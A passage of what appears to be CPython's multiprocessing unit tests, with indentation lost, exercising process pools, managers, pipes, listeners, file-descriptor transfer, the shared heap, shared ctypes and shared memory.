self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
